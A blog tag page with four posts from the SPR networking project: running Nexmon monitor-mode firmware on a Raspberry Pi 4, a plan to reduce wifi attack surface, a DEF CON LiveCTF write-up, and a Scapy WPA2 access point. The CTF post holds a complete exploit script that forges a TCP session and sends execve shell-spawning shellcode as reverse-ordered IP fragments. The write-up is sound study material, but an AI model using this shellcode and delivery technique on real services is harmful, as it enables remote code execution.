
4 posts tagged with "Scapy"


· 5 min read

The built-in wifi radio on a Raspberry Pi 4 is kind of sad, as it does not support monitor mode. Luckily, the hackers at Seemoo Lab have fixed this.

In this post we'll describe how to load Seemoo's Nexmon onto a Pi 4 running a modern kernel, and package it into an SPR plugin named spr-nexmon. We'll then demonstrate that packet capture and injection both work.

First, we will copy the template plugin

$ cp -R super/api_sample_plugin/ spr-nexmon

Development

Prebuilt binaries

We'll use some prebuilt binaries that include

  • the nexmon firmware build for the broadcom wifi radio
  • the 6.2 kernel build
  • the nexutil binary

These were built from the 6.1/6.2 support pull-request

$ cp -R ../nexmon/binaries spr-nexmon/binaries

Docker preparations

We'll update the Dockerfile to include some useful tools and build the project.

FROM ubuntu:23.04 as builder
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update
RUN apt-get install -y --no-install-recommends nano ca-certificates git curl
RUN mkdir /code
WORKDIR /code
ARG TARGETARCH
RUN curl -O https://dl.google.com/go/go1.20.linux-${TARGETARCH}.tar.gz
RUN rm -rf /usr/local/go && tar -C /usr/local -xzf go1.20.linux-${TARGETARCH}.tar.gz
ENV PATH="/usr/local/go/bin:$PATH"
COPY code/ /code/

ARG USE_TMPFS=true
RUN --mount=type=tmpfs,target=/tmpfs \
[ "$USE_TMPFS" = "true" ] && ln -s /tmpfs /root/go; \
go build -ldflags "-s -w" -o /nexmon_plugin /code/nexmon_plugin.go


FROM ghcr.io/spr-networks/container_template:latest
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && apt-get install -y --no-install-recommends tcpdump kmod iw wireless-regdb && rm -rf /var/lib/apt/lists/*
COPY scripts /scripts/
COPY --from=builder /nexmon_plugin /
COPY binaries/ nexmon/
ENTRYPOINT ["/scripts/startup.sh"]

We also want this container to use the host network and run privileged so that it can load kernel modules. We'll also set it to restart automatically.

Here's the docker-compose.yml:

version: '3.4'

x-logging:
  &default-logging
  driver: journald

x-labels:
  &default-labels
  org.supernetworks.ci: ${CI:-false}
  org.supernetworks.version: ${RELEASE_VERSION:-latest}${RELEASE_CHANNEL:-}

services:
  nexmon:
    container_name: supernexmon
    build:
      context: .
      labels: *default-labels
    logging: *default-logging
    restart: always
    network_mode: host
    privileged: true
    volumes:
      - /etc/timezone:/etc/timezone:ro
      - /etc/localtime:/etc/localtime:ro
      - /lib/firmware/cypress/:/lib/firmware/cypress/
      - "${SUPERDIR}./state/plugins/nexmon:/state/plugins/nexmon"
      - "${SUPERDIR}./state/public/:/state/public/:ro"

Extending the SPR API

The Nexmon patch breaks the ability to change channels normally. Instead, we can do it with the 'nexutil' binary that nexmon provides.

We'll rename sample_plugin.go to nexmon_plugin.go and define a new function

func changeChannel(w http.ResponseWriter, r *http.Request) {
	channel := r.URL.Query().Get("channel")

	// Use regexp.MatchString to check if the input matches the pattern
	matches, err := regexp.MatchString("^[0-9/]*$", channel)
	if err != nil || !matches {
		http.Error(w, "Invalid channel string", 400)
		return
	}

	err = exec.Command("/nexmon/nexutil", "-k"+channel).Run()
	if err != nil {
		http.Error(w, err.Error(), 400)
		return
	}
}
//...
func main() {
	//...
	unix_plugin_router.HandleFunc("/change_channel", changeChannel).Methods("PUT")
}
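
The pattern in the handler above also accepts an empty string or a run of slashes, since it only restricts the character set. As a rough illustration of a tighter check, here is a minimal Python sketch. The accepted shape ("<channel>" or "<channel>/<width>") is an assumption made for this example, not the full chanspec syntax that nexutil understands, and the names CHANSPEC_RE and is_valid_chanspec are hypothetical.

```python
import re

# Hypothetical stricter pattern: a channel number, optionally followed by
# "/<width>", for example "4" or "36/80". This is an assumption for the
# sketch, not nexutil's complete chanspec grammar.
CHANSPEC_RE = re.compile(r"[0-9]{1,3}(/[0-9]{2,3})?")


def is_valid_chanspec(channel: str) -> bool:
    """Return True only for strings shaped like "<channel>" or "<channel>/<width>"."""
    return CHANSPEC_RE.fullmatch(channel) is not None


if __name__ == "__main__":
    for candidate in ["4/20", "36/80", "", "//", "4/"]:
        print(repr(candidate), is_valid_chanspec(candidate))
```

The same regular expression could be dropped into the Go handler's regexp.MatchString call if anchored with ^ and $.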

Updating the startup script

When the container runs, we'll have it make sure the Seemoo firmware and kernel module are freshly loaded.

startup.sh:

#!/bin/bash

cd /nexmon
cp brcmfmac43455-sdio.bin /lib/firmware/cypress/cyfmac43455-sdio-standard.bin

rmmod brcmfmac_wcc
rmmod brcmfmac

insmod brcmfmac.ko

sleep 1

iw phy `iw dev wlan0 info | awk '/wiphy/ {printf "phy" $2}'` interface add mon0 type monitor

echo [+] Loaded

cd /
/nexmon_plugin
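
The awk one-liner in the script turns the "wiphy N" line printed by iw into the name "phyN". For readers less used to awk, the same extraction can be sketched in Python. The function name phy_name and the SAMPLE text are made up for illustration; real iw output has more fields.

```python
import re
from typing import Optional


def phy_name(iw_info: str) -> Optional[str]:
    """Return "phyN" from the text printed by `iw dev <iface> info`, or None."""
    # Look for a line of the form "wiphy <number>".
    match = re.search(r"^\s*wiphy\s+(\d+)\s*$", iw_info, flags=re.MULTILINE)
    return f"phy{match.group(1)}" if match else None


# Illustrative, shortened sample of `iw dev wlan0 info` output (an assumption).
SAMPLE = """Interface wlan0
    ifindex 44
    type managed
    wiphy 10
"""

if __name__ == "__main__":
    print(phy_name(SAMPLE))  # prints: phy10
```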

Loading

After building with docker compose build, we'll configure the API to load the plugin.

In the UI or by modifying configs/base/api.json, add the nexmon plugin*

{
  "Name": "nexmon",
  "URI": "nexmon",
  "UnixPath": "/state/plugins/nexmon/socket",
  "Enabled": true,
  "Plus": false,
  "GitURL": "",
  "ComposeFilePath": ""
}

Start the plugin with

SUPERDIR=/home/spr/super/ docker compose up -d

Testing

Running tcpdump should show captured 802.11 packets from the environment

# tcpdump -i wlan0 ...

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on wlan0, link-type IEEE802_11_RADIO (802.11 plus radiotap header), snapshot length 262144 bytes
22:50:27.005540 1876482302us tsft 1.0 Mb/s 2412 MHz 11b -68dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.046106 1876522917us tsft 1.0 Mb/s 2412 MHz 11b -46dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.107930 1876584711us tsft 1.0 Mb/s 2412 MHz 11b -70dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.148500 1876625317us tsft 1.0 Mb/s 2412 MHz 11b -46dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
22:50:27.210323 1876687100us tsft 1.0 Mb/s 2412 MHz 11b -67dBm signal 0dBm noise Beacon (wifi-2.4) [1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0 Mbit] ESS CH: 1, PRIVACY
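
The link type in the capture above is 802.11 with a radiotap header, so every captured frame starts with a variable-length radiotap block followed by the 802.11 frame itself. As a small sketch of what that means when handling raw bytes, the Python below splits off the radiotap header and checks whether the frame is a beacon. The function names are hypothetical and the sample bytes in the usage part are synthetic, not taken from this capture.

```python
import struct


def split_radiotap(frame: bytes):
    """Split a captured frame into (radiotap_header, ieee80211_frame)."""
    if len(frame) < 8:
        raise ValueError("too short for a radiotap header")
    # Radiotap begins with: version (u8), pad (u8), length (u16 LE), present (u32 LE).
    version, _pad, length, _present = struct.unpack_from("<BBHI", frame, 0)
    if version != 0 or length < 8 or length > len(frame):
        raise ValueError("not a radiotap frame")
    return frame[:length], frame[length:]


def is_beacon(dot11: bytes) -> bool:
    """True if the 802.11 frame control field marks a management beacon."""
    if len(dot11) < 2:
        return False
    frame_type = (dot11[0] >> 2) & 0x3  # 0 = management
    subtype = (dot11[0] >> 4) & 0xF     # 8 = beacon
    return frame_type == 0 and subtype == 8


if __name__ == "__main__":
    # Synthetic frame: minimal 8-byte radiotap header + beacon frame control.
    sample = bytes([0, 0, 8, 0, 0, 0, 0, 0]) + b"\x80\x00" + b"\x00" * 22
    header, dot11 = split_radiotap(sample)
    print(len(header), is_beacon(dot11))
```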

We can also verify that our channel switch api extension works

# curl -u admin:admin localhost/plugins/nexmon/change_channel?channel=4/20 -X PUT
# iw dev

phy#10
Interface wlan0
ifindex 44
wdev 0xa00000002
addr 00:00:00:00:00:00
type monitor
channel 4 (2427 MHz), width: 20 MHz, center1: 2427 MHz
Interface mon0
ifindex 43
wdev 0xa00000001
addr e4:5f:01:fd:a1:76
type managed
channel 4 (2427 MHz), width: 20 MHz, center1: 2427 MHz
txpower 31.00 dBm
...
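
The curl call above can also be issued from Python. The sketch below only uses the standard library and builds the same PUT request with HTTP basic auth. The helper name change_channel_request is hypothetical, and the base URL and admin:admin credentials simply mirror the curl example.

```python
import base64
import urllib.parse
import urllib.request


def change_channel_request(base_url: str, channel: str, user: str, password: str):
    """Build (but do not send) the PUT request for the change_channel endpoint."""
    query = urllib.parse.urlencode({"channel": channel})
    req = urllib.request.Request(
        f"{base_url}/plugins/nexmon/change_channel?{query}", method="PUT"
    )
    # HTTP basic auth, equivalent to curl's -u user:password.
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    return req


if __name__ == "__main__":
    req = change_channel_request("http://localhost", "4/20", "admin", "admin")
    print(req.get_method(), req.full_url)
    # To actually send it: urllib.request.urlopen(req)
```

Note that urlencode percent-encodes the slash in "4/20"; the Go handler's r.URL.Query().Get decodes it again before validation.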

* Note that the SPR UI does not allow specifying a docker compose path directly from the UI. Instead, a user can modify or create a list in configs/base/custom_compose_paths.json to do so.

Running barely-ap

Besides sniffing traffic, we can also do wild things with packet injection, like running a WPA2 access point written in scapy.

Since the nexmon patch is a bit hacky, we set the wlan0 MAC address ourselves and make sure the channel matches:

ap = AP("turtlenet", "password1234", mode="iface", iface="wlan0", mac="e4:5f:01:cd:a1:76", channel=4)

“ET VOILÀ!”:

root@wifilab0:~/barely-ap/src# python3 ap.py                                                                                                                  
command failed: Device or resource busy (-16)
Created TUN interface scapyap at 10.10.10.1. Bind it to your services if needed.
Sending Authentication to 56:66:a3:9c:71:8b from e4:5f:01:cd:a1:76 (0x0B)...
Sending Association Response (0x01)...
sent eapol m1 56:66:a3:9c:71:8b
[+] New associated station 56:66:a3:9c:71:8b for bssid e4:5f:01:cd:a1:76

Want to try it yourself on SPR?

You can grab spr-nexmon here and barely-ap at https://github.com/spr-networks/barely-ap.

· 3 min read

Reducing Attack Surfaces (Part 1)

SPR lets users create adaptive, micro-segmented networks for connecting and managing devices. In addition to fine-grained network visibility we also build hardened software and work to avoid common security flaws. As SPR has matured we've started taking on further efforts to eliminate attack surfaces.

When it comes to native code, we introduce none: we have not written any new native code for SPR. We have one BPF filter, and it's otherwise Go all the way down. We also avoid running standard native services where we can. We have replaced the traditional C implementations of services such as DNS and DHCP with Go implementations, namely CoreDNS and CoreDHCP.

The remaining native code targets that we have in SPR are as follows:

  • The Linux kernel. For example: ethernet, the tcp/ip stack, nftables, the mac80211 framework and vendor drivers
  • 802.11 Firmware, Ethernet Firmware
  • Hostapd
  • PPP Daemon (off by default)
  • OS Services (Ubuntu)

Targeting the Whole WiFi Stack

We believe the wifi firmware to be today's most insecure target (along with the vendor drivers). Many firmware images are black boxes: poorly documented and opaque to public security research. We want SPR to be immune to attacks like Broadpwn and Qualcomm Exploitation.

We've previously published barely-ap to teach people about WiFi authentication. It can and does work with real wifi chips running in monitor mode to connect clients over the air. We've tested with Android, iOS, and Linux devices.

The plan is to build a series of experiments to host high-speed wifi.

In the near term:

  1. Develop a Proof-of-Concept AP with scapy in monitor mode (DONE)
  2. Develop a shim from monitor frames to hostapd running under mac80211_hwsim. This is a work in progress. We would like to see a Rust kernel driver or userland daemon for this

Future:

  1. A full AP written in Rust, operating on raw 802.11 frames (not relying on the Linux kernel 802.11 subsystem)
  2. Rust protocol firmware for a wifi chip.

Developing a Shim Explained

By running the card in monitor mode, protocol parsing in the card firmware is substantially reduced if not altogether eliminated.

Once frames are relayed over to mac80211_hwsim, hostapd is good to go. What remains is making this relay very fast, and researching rate negotiation and which calls might need to be made to the firmware to enable higher coding rates.

By using hostapd and the kernel mac80211 stack, we still keep some native attack surface. In exchange we get a known-working, security-tested AP that is compatible with a wide variety of devices, without the protocol parsing in the firmware and the vendor driver.

For next steps, a proof-of-concept with scapy is much too slow. We want to start with a Rust userland daemon leveraging io_uring. If that doesn't fly, we'll move the shim into the kernel.

Interested in working with us? Please reach out

We are actively seeking an intern to help develop Rust + wifi for SPR.

You can contact us at spr-wifi [ a-t ] supernetworks.org or hop on the discord

· 6 min read

Noppenheimer

At the DEF CON CTF Finals, the final round of LiveCTF went into sudden death. The challenge was named Noppenheimer, a play on the Oppenheimer film and on NOP (no-op) instructions.

Contestants had to turn a random sequence of bytes into a gadget/shellcode cave by converting bytes into NOPs, which they did by sending "nuke" LAUNCH commands.

Options:
LAUNCH x,y - Launch a test at position x,y
VIEW - See state of test site
ENDTEST - Conclude testing
>

Both teams solved locally. But they couldn't exploit Noppenheimer against the remote system.

What Went Wrong

Teams used a single read/recv syscall to receive the shellcode they wanted to run. With no delays in the program, that call returns as soon as any data is available, so if the payload is larger than the MTU it returns only part of the TCP data. The payloads crashed on the remote end because the shellcode had arrived incomplete.

As @ZetaTwo and @psifertex explain, the conditions that cause this are highly specific to the exploit: payload length, delays, and other factors. The testers' exploits didn't trigger the problem.
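
The general pitfall is that one recv call on a stream socket may return fewer bytes than were sent. The teams' actual receive stubs are not shown here, so the following is only a generic Python sketch of the usual remedy, a loop that keeps reading until the expected number of bytes has arrived. The name recv_exact is hypothetical.

```python
import socket


def recv_exact(sock: socket.socket, size: int) -> bytes:
    """Keep calling recv until exactly `size` bytes have been read."""
    chunks = []
    remaining = size
    while remaining > 0:
        chunk = sock.recv(remaining)
        if not chunk:
            # The peer closed the connection before sending everything.
            raise ConnectionError("connection closed with %d bytes missing" % remaining)
        chunks.append(chunk)
        remaining -= len(chunk)
    return b"".join(chunks)


if __name__ == "__main__":
    # Local demonstration with a connected socket pair: two separate sends,
    # one logical read.
    left, right = socket.socketpair()
    left.sendall(b"A" * 1000)
    left.sendall(b"B" * 1000)
    data = recv_exact(right, 2000)
    print(len(data))
    left.close()
    right.close()
```

A first-stage shellcode rarely has room for such a loop, which is why controlling how the data arrives on the wire is attractive.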

Solving with IP Fragmentation

IP packets can be fragmented into multiple packets when they exceed the MTU, the maximum number of octets that layer 2 will carry in one frame (typically 1500 on Ethernet).

By sending the fragments in reverse order, we can ensure that the recv/read call gets all of the data that has been sent, even beyond the MTU size. The receiver's IP layer reassembles the datagram before TCP sees it, so the payload becomes readable all at once.

Here is a Python solution, combining scapy with pwntools and meant to run inside a container, that does just that.
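
To make the fragment layout concrete, here is a small standard-library sketch that computes which pieces of an IP payload go into which fragment and lists them last fragment first. It only plans offsets; it does not build or send packets. The name plan_fragments is hypothetical, and rounding the fragment size down to a multiple of 8 reflects the IP rule that fragment offsets are counted in 8-byte units.

```python
def plan_fragments(payload_len: int, fragsize: int):
    """Return (offset_in_8_byte_units, length, more_fragments) tuples, last fragment first."""
    if fragsize < 8:
        raise ValueError("fragment size must be at least 8 bytes")
    # Every fragment except the last must carry a multiple of 8 bytes.
    fragsize -= fragsize % 8
    plan = []
    for start in range(0, payload_len, fragsize):
        length = min(fragsize, payload_len - start)
        more_fragments = start + length < payload_len
        plan.append((start // 8, length, more_fragments))
    # Reverse so that the fragment carrying offset 0 is sent last.
    return plan[::-1]


if __name__ == "__main__":
    for offset, length, more in plan_fragments(250, 100):
        print(offset, length, more)
```

For a 250-byte IP payload and a requested size of 100, this yields three fragments of 58, 96 and 96 bytes at offsets 24, 12 and 0.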

As a bonus, it also includes a semi-working TCP implementation written in pure scapy/python.

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Author: [email protected] <github.com/lts-rad>
'''
Demo of TCP w/ sending fragmented payloads with scapy.

Run this code inside of a namespace/container. Since Linux sends RST for forged SYN packets,
this code will use iptables to block them.

#> iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <src_ip> -j DROP
'''
from scapy.all import *
from pwn import *

# Explicit stdlib imports come last so the wildcard imports above cannot shadow them.
import logging
import os
import random
import threading
import time

logger = logging.getLogger(__name__)
#logging.basicConfig(level=logging.DEBUG)
#logger.setLevel(logging.DEBUG)

class TcpHandshake(object):

    class RLoop(threading.Thread):
        """Background thread that sniffs replies and feeds them to the TCP state."""
        def __init__(self, tcp):
            threading.Thread.__init__(self)
            self.tcp = tcp

        def handle_recv(self, pkt):
            if pkt and pkt.haslayer(IP) and pkt.haslayer(TCP):
                if pkt[TCP].flags & 0x3f == 0x12: # SYN+ACK
                    logger.debug("RCV: SYN+ACK")
                    self.tcp.send_synack_ack(pkt)
                    return
                elif pkt[TCP].flags & 4 != 0: # RST
                    logger.debug("RCV: RST")
                    #raise Exception("RST")
                    self.tcp.abort = True
                    return
                elif pkt[TCP].flags & 0x1 == 1: # FIN
                    logger.debug("RCV: FIN")
                    self.tcp.send_finack(pkt)
                    return
                elif pkt[TCP].flags.A: # ACK came in?
                    logger.debug("RCV: ACK")
                    self.tcp.send_base = pkt[TCP].ack

                logger.debug("RCV: %s"%repr(pkt))
                if len(pkt[TCP].payload) > 0:
                    self.tcp.Q += [bytes(pkt[TCP].payload)]
                    self.tcp.send_ack(pkt)

                #great, got an ack, check the send queue for pending data
                while len(self.tcp.send_queue) > 0:
                    ret = self.tcp.send_data(self.tcp.send_queue.pop(0))
                    if ret == False:
                        break

                return
            else:
                logger.debug("? Unhandled packet")
                return


        def run(self):
            ans = sniff(filter="tcp port %s"%self.tcp.target[1], lfilter=self.tcp.match_packet, prn=self.handle_recv, store=False)

    def __init__(self, target, sport=31337):
        self.seq = 0
        self.seq_next = 0
        self.target = target
        self.dst = next(iter(Net(target[0])))
        self.dport = target[1]
        self.sport = sport #random.randrange(0, 2**16)
        self.seq_start = random.randrange(0, 2**32)
        # options=[('WScale', 7)]
        self.l4 = IP(version=4,dst=target[0])/TCP(sport=self.sport, dport=self.dport, flags=0,
                                                  seq=self.seq_start, window=65535)
        self.src = self.l4.src
        self.Q = []
        self.abort = False


        self.send_base = self.l4[TCP].seq
        self.send_window = self.l4[TCP].window
        self.last_sent = self.send_base
        self.send_queue = []

        self.last_ack = 0

        #let underlying handle ethernet
        self.s = conf.L3socket()

        self.R = self.RLoop(self)
        self.R.start()
        logger.debug("init: %s"%repr(target))

    def start(self):
        logger.debug("start")
        return self.send_syn()

    def match_packet(self, pkt):
        # Only accept packets addressed to our forged connection.
        if pkt.haslayer(IP) and pkt[IP].dst == self.l4[IP].src \
           and pkt.haslayer(TCP) and pkt[TCP].dport == self.sport:
            if pkt[TCP].ack <= self.seq_next and pkt[TCP].ack >= self.seq_start:
                return True
            else:
                logger.debug("ack was %d expected %d" % (pkt[TCP].ack, self.seq_next))
        return False

    def send_syn(self):
        logger.debug("SND: SYN")
        self.l4[TCP].flags = "S"
        self.seq_next = self.l4[TCP].seq + 1
        self.s.send(self.l4)
        self.l4[TCP].seq += 1

    def send_synack_ack(self, pkt):
        logger.debug("SND: SYN+ACK -> ACK with ack # %d" % (pkt[TCP].seq + 1))
        self.l4[TCP].ack = pkt[TCP].seq + 1
        self.l4[TCP].flags = "A"
        self.seq_next = self.l4[TCP].seq
        self.s.send(self.l4)

    def send_data(self, d):
        if self.abort == True:
            print("[-] not sending data, aborted !!!")
            return False
        self.l4[TCP].flags = "PA"

        # Bytes we may still send without overrunning the peer's window.
        available = self.send_base + self.send_window - self.last_sent

        if available == 0:
            self.send_queue += [d]
            # have to wait
            return False
        assert available >= 0

        if available < len(d):
            d, chop = d[:available], d[available:]
            self.send_queue += [chop]

        self.seq_next = self.l4[TCP].seq + len(d)
        self.last_sent = self.seq_next
        tosend = self.l4/d

        self.s.send(tosend)
        self.l4[TCP].seq += len(d)
        return True

    def send_frag_data(self, d, sz):
        if self.abort == True:
            print("[-] not sending data, aborted !!!")
            return
        assert sz >= 8
        self.l4[TCP].flags = "PA"

        #tbd send window handling for fragments(?)
        dat = self.l4/d
        fragments = fragment(dat, sz)
        # Send the IP fragments in reverse order, last fragment first.
        for f in fragments[::-1]:
            self.s.send(f)

        self.seq_next = self.l4[TCP].seq + len(d)
        self.last_sent = self.seq_next
        self.l4[TCP].seq += len(d)
        return True

    def send_fin(self):
        logger.debug("SND: FIN")
        self.l4[TCP].flags = "F"
        self.seq_next = self.l4[TCP].seq + 1
        self.s.send(self.l4)
        self.l4[TCP].seq += 1

    def send_rst(self):
        logger.debug("SND: RST")
        self.l4[TCP].flags = "R"
        self.seq_next = self.l4[TCP].seq + 1
        self.s.send(self.l4)
        self.l4[TCP].seq += 1

    def send_finack(self, pkt):
        logger.debug("SND: FIN+ACK")
        self.l4[TCP].flags = "FA"
        self.l4[TCP].ack = pkt[TCP].seq + 1
        self.seq_next = self.l4[TCP].seq + 1
        self.s.send(self.l4)
        self.l4[TCP].seq += 1
        #raise Exception("FIN+ACK")
        self.abort = True

    def send_ack(self, pkt):
        self.l4[TCP].flags = "A"

        self.last_ack = pkt[TCP].ack
        to_acknowledge = len(pkt[TCP].payload)
        #logger.debug("SND: ACK with ack # %d" % (pkt[TCP].seq + len(pkt[TCP].load)))

        if to_acknowledge != 0:
            self.l4[TCP].ack = pkt[TCP].seq + to_acknowledge
            self.s.send(self.l4)

    def recv(self, timeout):
        elapsed = 0
        step = 0.01
        while (timeout != 0) and (elapsed < timeout):
            if len(self.Q) > 0:
                retval = self.Q.pop(0)
                return retval
            time.sleep(step)
            # Advance by the sleep interval so the timeout can actually expire.
            elapsed += step
        #returning nothing (bytes, to match the queued payloads)
        return b""

    def clear_recv(self):
        self.Q = []

    def wait_all_acks(self, timeout=0):
        elapsed = 0
        delta = 0.1
        while (timeout != 0) and (elapsed < timeout):
            if self.last_ack == self.seq_next and len(self.send_queue) == 0:
                return True
            time.sleep(delta)
            elapsed += delta
        return False



if __name__== '__main__':
    sport = random.randint(40000, 60000)
    # Drop the kernel's own RSTs for our forged connection.
    os.system("iptables -F OUTPUT")
    os.system("iptables -A OUTPUT -p tcp --sport %d --tcp-flags RST RST -j DROP"%sport)
    conf.verb = 0

    tcp_hs = TcpHandshake(("172.17.0.2", 31337), sport=sport)

    # Reuse pwntools' tube helpers on top of the scapy TCP implementation.
    r = tubes.sock.sock()
    r.send = tcp_hs.send_data
    r.recv = tcp_hs.recv
    tcp_hs.start()

    tosend = b""
    def nuke(offset):
        global tosend
        # scapy send is slow. to speed it up,
        # chunk the commands
        if len(tosend) > 400:
            r.send(tosend)
            tosend = b""

        tosend += b'LAUNCH %d,%d\n'%(offset%0x10,offset//0x10)

    def nukes(a, b):
        for i in range(a, b):
            nuke(i)


    nukes(0, 0x40)
    nukes(0x50, 0x58)
    nukes(0x5b, 0x60)
    nukes(0x70, 0xb0)
    nukes(0xc0, 0xc3)

    nukes(0xc6, 0xc7)
    nukes(0xca, 0xd0)
    nuke(0xdc)
    nukes(0xe0, 0xec)
    nukes(0xed, 0xf0)

    nukes(0x108, 0x10c)
    nukes(0x10d, 0x473)
    nukes(0x495, 0xc17)
    nuke(0)

    if tosend:
        r.send(tosend)

    tosend = b'ENDTEST\n'
    r.send(tosend)

    context.arch = 'amd64'
    sc = b'\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

    print("******** sending shellcode ***********")
    d = b'\x90' * (0xd00+200) + sc

    tcp_hs.send_frag_data(d, 100)
    #input()

    r.recvuntil(b'ENDTEST')

    #input("Ready?")
    print("Waiting for data to come in...")
    time.sleep(2)
    tcp_hs.clear_recv()
    print("[+] Good")

    try:
        r.interactive()
    except:
        print('aborted')

    print("over")
    # raw_input() does not exist in Python 3
    input()
    os.system("iptables -F OUTPUT")
    tcp_hs.send_fin()
    tcp_hs.send_rst()

Dockerfile:

FROM python:3.8-slim

# Set the working directory
WORKDIR /app

# Install system dependencies
RUN apt-get update && apt-get install -y libpcap-dev

# Install Scapy using pip
RUN pip install scapy pwntools
RUN pip uninstall pyelftools -y
RUN pip install pyelftools==0.29

RUN apt-get install -y iptables net-tools
RUN apt-get install -y tmux tcpdump iproute2
COPY connect.py .

ENTRYPOINT ["/app/connect.py"]

· One min read

Introducing Barely AP

We've published barely-ap, an implementation of a WiFi 802.11 access point written with Scapy, to teach people about WiFi authentication.

What

On Linux, this code lets you spin up a Python access point over monitor mode. It handles probe requests, authentication, association, and reassociation, and it encrypts and decrypts data using CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol).
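
As one concrete piece of WPA2 authentication, the pairwise master key in WPA2-PSK is derived from the passphrase and the SSID with PBKDF2-HMAC-SHA1 (4096 iterations, 32 bytes). The sketch below shows that step with the standard library only. It is not taken from barely-ap's source, and the function name wpa2_pmk is hypothetical.

```python
import hashlib


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the 32-byte WPA2-PSK pairwise master key from passphrase and SSID."""
    # PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit output.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


if __name__ == "__main__":
    pmk = wpa2_pmk("password1234", "turtlenet")
    print(pmk.hex())
```

Both the AP and the station compute this value independently; the four-way handshake then proves that each side holds it without sending it over the air.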

Note

This code just barely gets the job done. It should NOT be used as a reference for writing production code. It offers NO protocol security: although it performs authenticated CCMP encryption, it has not been hardened against attacks.

Usage:

Building & running

./build.sh
./setup.sh

Inspect IP traffic


docker exec -it barely-ap tcpdump -i scapyap
docker exec -it barely-sta tcpdump -i wlan1